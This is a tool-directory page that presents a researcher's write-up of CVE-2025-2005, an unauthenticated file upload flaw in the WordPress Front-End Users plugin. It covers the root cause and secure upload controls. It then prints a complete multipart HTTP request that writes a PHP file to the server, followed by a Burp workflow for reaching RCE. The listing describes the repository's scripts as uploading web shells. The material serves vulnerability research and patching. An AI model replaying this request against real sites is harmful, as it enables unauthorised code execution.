Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2005 — Proof-of-concept exploit for CVE-2025-2005, an arbitrary file upload vulnerability in the WordPress Front-End Users Plugin (<=3.2.32). Includes manual HTTP and Python exploit scripts for uploading PHP web shells to unauthenticated registration forms. | Kitploit
Tools/GitHubGitHub/h4ckxel/cve-2025-2005
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubh4ckxel/cve-2025-2005

CVE-2025-2005

Proof-of-concept exploit for CVE-2025-2005, an arbitrary file upload vulnerability in the WordPress Front-End Users Plugin (<=3.2.32). Includes manual HTTP and Python exploit scripts for uploading PHP web shells to unauthenticated registration forms.

View Repository
174 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-2005 — Front-End Users Arbitrary File Upload

CVE-2025-2005

WordPress Front-End Users — Unauthenticated Arbitrary File Upload

0xZ3R0 // h4ckxel

CVE WordPress Status Research


0x00 — Executive Summary

Front-End Users is affected by an unauthenticated arbitrary file upload vulnerability affecting versions ≤ 3.2.32.

The vulnerable registration workflow exposes an upload primitive that can be reached without requiring a privileged WordPress account.

The underlying issue is insufficient validation of attacker-controlled upload metadata and content before the file is persisted to the filesystem.

Attack chain

                  UNAUTHENTICATED ATTACKER
                           │
                           ▼
                 Public registration form
                           │
                           ▼
                  multipart/form-data
                           │
                           ▼
                Front-End Users handler
                           │
                           ▼
                Insufficient validation
                           │
                           ▼
                Attacker-controlled file
                           │
                           ▼
        /wp-content/uploads/ewd_feup_uploads/
                           │
                           ▼
              Web-accessible resource
                           │
                           ▼
             PHP execution if permitted
                           │
                           ▼
                         RCE

The final impact depends on the target's web-server and PHP configuration.


0x01 — Vulnerability Metadata

PropertyValue
CVECVE-2025-2005
ProductFront-End Users
Affected versions≤ 3.2.32
CWECWE-434
ClassUnrestricted Upload of File with Dangerous Type
Attack vectorNetwork
AuthenticationNone
Privileges requiredNone
User interactionNone
Primary primitiveArbitrary file upload
Potential impactRemote Code Execution
Researcherh4ckxel
Namespace0xZ3R0

0x02 — Vulnerability Classification

CWE-434

Unrestricted Upload of File with Dangerous Type

The vulnerable behavior can be reduced to:

Untrusted Input
      │
      ├── filename
      ├── extension
      ├── MIME type
      └── file content
             │
             ▼
       upload handler
             │
             ▼
        filesystem

The security boundary fails because attacker-controlled data reaches a persistent filesystem location without sufficient validation.


0x03 — Attack Surface

The vulnerable functionality is associated with the plugin's front-end registration system.

A typical registration request contains:

ewd-feup-action=register
Username=<value>
User_Password=<value>

and may contain an additional multipart file field:

Content-Disposition: form-data;
name="xxploit";
filename="poc.php"

Content-Type: application/x-php

The interesting part isn't the registration itself.

The interesting part is that the request crosses the following trust boundary:

                 INTERNET
                    │
                    ▼
          attacker-controlled HTTP
                    │
                    ▼
          registration endpoint
                    │
                    ▼
             upload handler
                    │
                    ▼
              filesystem

0x04 — Root Cause

The vulnerability originates from inadequate server-side validation of uploaded files.

A secure implementation should establish multiple independent controls:

                   UPLOAD
                     │
        ┌────────────┴────────────┐
        ▼                         ▼
 Authentication              Authorization
        │                         │
        └────────────┬────────────┘
                     ▼
             Extension allowlist
                     │
                     ▼
              MIME verification
                     │
                     ▼
              Content validation
                     │
                     ▼
            Server-side filename
                     │
                     ▼
          Non-executable storage

Any one of these controls being absent does not necessarily create RCE.

The problem becomes substantially more severe when multiple layers fail simultaneously.


0x05 — Controlled PoC

The following PoC demonstrates the file-write primitive without deploying a command shell.

HTTP request

POST /wordpress/2025/04/02/test/ HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=----0xZ3R0Boundary

------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-check"

14bacb882cb211e10b2b3e07bfe096ef12a092dc
------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-time"

1743554029
------0xZ3R0Boundary
Content-Disposition: form-data; name="ewd-feup-action"

register
------0xZ3R0Boundary
Content-Disposition: form-data; name="Username"

poc-user
------0xZ3R0Boundary
Content-Disposition: form-data; name="xxploit"; filename="poc.php"
Content-Type: application/x-php

<?php echo "CVE-2025-2005"; ?>

------0xZ3R0Boundary--

Expected filesystem result

wp-content/
└── uploads/
    └── ewd_feup_uploads/
        └── <randomized-name>.php

The important observation is:

attacker-controlled extension
            +
attacker-controlled content
            +
persistent filesystem write

0x06 — Burp Suite Workflow

A practical workflow for a lab environment:

[1] Open registration page
        │
        ▼
[2] Submit legitimate registration
        │
        ▼
[3] Intercept request with Burp
        │
        ▼
[4] Locate multipart file parameter
        │
        ▼
[5] Replace benign file with PoC file
        │
        ▼
[6] Forward request
        │
        ▼
[7] Inspect response
        │
        ▼
[8] Verify filesystem artifact
        │
        ▼
[9] Test whether uploads are executable

The security-critical observation should be made before attempting any post-exploitation.


0x07 — Request Diff

Legitimate request

Content-Disposition: form-data;
name="avatar";
filename="avatar.jpg"

<image-data>

Modified request

Content-Disposition: form-data;
name="xxploit";
filename="poc.php"

<?php echo "CVE-2025-2005"; ?>

Conceptually:

- filename="avatar.jpg"
+ filename="poc.php"

- <image-data>
+ <?php echo "CVE-2025-2005"; ?>

This illustrates the core primitive without relying on a weaponized payload.


0x08 — Safe Verification

Download Tool